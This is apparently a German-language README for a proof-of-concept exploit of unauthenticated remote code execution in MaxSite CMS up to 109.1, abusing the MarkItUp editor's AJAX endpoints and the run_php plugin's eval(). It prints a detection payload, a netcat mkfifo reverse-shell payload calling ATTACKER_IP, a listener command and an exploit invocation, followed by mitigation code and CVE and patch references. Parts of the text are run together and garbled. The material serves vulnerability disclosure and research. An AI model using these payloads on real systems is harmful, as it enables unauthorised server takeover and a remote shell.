
Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung in MaxSite CMS <= 109.1 über die AJAX-Endpunkte des MarkItUp-Editors, mit Erkennungs- und Reverse-Shell-Payloads.
Unauthenticated Remote Code Execution (RCE)-Schwachstelle in MaxSite CMS ≤ 109.1.
Der Fehler entsteht durch schwache Autorisierungsprüfungen in den AJAX-Endpunkten des MarkItUp-Editor-Plugins, kombiniert mit unsicherer Ausführung von benutzerbereitgestelltem PHP-Code durch das run_php-Plugin.
Die Schwachstelle betrifft die folgenden Dateien im MarkItUp-Editor-Plugin:
preview-ajax.phpautosave-post-ajax.phpDiese Endpunkte:
run_php-Plugin weiter[php]...[/php]-Shortcodes mit eval() ausEin Angreifer kann eine manipulierte POST-Anfrage an die /ajax/-Route senden, die einen Base64-kodierten internen Pfad und einen bösartigen PHP-Payload über den data-Parameter enthält, was zu Folgendem führt:
graph TD
A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
B -->|"Referer Spoofing"| C["preview-ajax.php"]
C -->|"Unsanitized Input"| D["run_php Plugin"]
D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
E -->|"Command Execution"| F["Compromised Server"]
run_php-Plugin aktiviert (häufige Standardeinstellung)eval() erlaubtEin Proof-of-Concept-Exploit in Python 3 (exploit.py) ist enthalten.
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]
nc -lvnp 9001
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001
run_php-Plugin, falls es nicht benötigt wirdFügen Sie Authentifizierungsprüfungen zu den verwundbaren Dateien hinzu:
if (!is_login()) {
die('Access denied');
}
mso_checkreferer();
Patch-Commit https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
Schwachstelleneintrag https://vuldb.com/?id.348281
NVD-Eintrag https://nvd.nist.gov/vuln/detail/CVE-2026-3395
Dieses Projekt wird bereitgestellt für:
⚠️ Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.
Mohammed Idrees Banyamer Jordanien 🇯🇴 Sicherheitsforscher
banyamer_security — Silent Hunter • Shadow Presence
März 2026